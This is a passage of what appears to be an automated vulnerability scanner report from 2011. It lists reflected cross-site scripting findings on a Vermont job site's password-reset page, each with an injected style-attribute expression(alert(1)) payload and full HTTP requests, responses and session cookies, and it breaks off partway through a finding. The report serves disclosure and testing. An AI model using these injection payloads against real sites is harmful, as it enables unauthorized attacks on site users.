The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22113"style%3d"x%3aexpression(alert(1))"293bf60f081 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as 22113"style="x:expression(alert(1))"293bf60f081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=22113"style%3d"x%3aexpression(alert(1))"293bf60f081&FORMNAME_prev=Form0&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:48'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="bltextboxextradonotuse1_error" value="22113"style="x:expression(alert(1))"293bf60f081" class="cfTransparent" />
...[SNIP]...

3.134. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as aa244"style="x:expression(alert(1))"619b41b3cda6e8e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The original request used the POST method; however, it was possible to convert the request to the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:06 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="BLTEXTBOXEXTRADONOTUSE1_prev" value="aa244"style="x:expression(alert(1))"619b41b3cda6e8e06" />
...[SNIP]...

3.135. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9626d"style%3d"x%3aexpression(alert(1))"bc06bcef9e was submitted in the cftextboxextradonotuse parameter. This input was echoed as 9626d"style="x:expression(alert(1))"bc06bcef9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=9626d"style%3d"x%3aexpression(alert(1))"bc06bcef9e&bltextboxextradonotuse1=&FORMNAME_prev=Form0&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fl
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:43'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="cftextboxextradonotuse_error" value="9626d"style="x:expression(alert(1))"bc06bcef9e" class="cfTransparent" />
...[SNIP]...

3.136. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [cftextboxextradonotuse parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5 was submitted in the cftextboxextradonotuse parameter. This input was echoed as 862fa"style="x:expression(alert(1))"ccd6b612736c001e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The original request used the POST method; however, it was possible to convert the request to the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="CFTEXTBOXEXTRADONOTUSE_prev" value="862fa"style="x:expression(alert(1))"ccd6b612736c001e5" />
...[SNIP]...

3.137. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [choice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2035"style%3d"x%3aexpression(alert(1))"4c07fa26276 was submitted in the choice parameter. This input was echoed as b2035"style="x:expression(alert(1))"4c07fa26276 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2b2035"style%3d"x%3aexpression(alert(1))"4c07fa26276&cftextboxextradonotuse=&bltextboxextradonotuse1=&FORMNAME_prev=Form0&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:39'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="old_choice" value="2b2035"style="x:expression(alert(1))"4c07fa26276" class="cfTransparent">
...[SNIP]...

3.138. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [errorfields parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the errorfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853 was submitted in the errorfields parameter. This input was echoed as d074f"style="x:expression(alert(1))"ea31d84cdc0b4d853 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The original request used the POST method; however, it was possible to convert the request to the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuseridd074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="ERRORFIELDS_prev" value="usvuseridd074f"style="x:expression(alert(1))"ea31d84cdc0b4d853" />
...[SNIP]...

3.139. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f22"style%3d"x%3aexpression(alert(1))"386752025378121a2 was submitted in the formid parameter. This input was echoed as 98f22"style="x:expression(alert(1))"386752025378121a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The original request used the POST method; however, it was possible to convert the request to the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=1098f22"style%3d"x%3aexpression(alert(1))"386752025378121a2&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
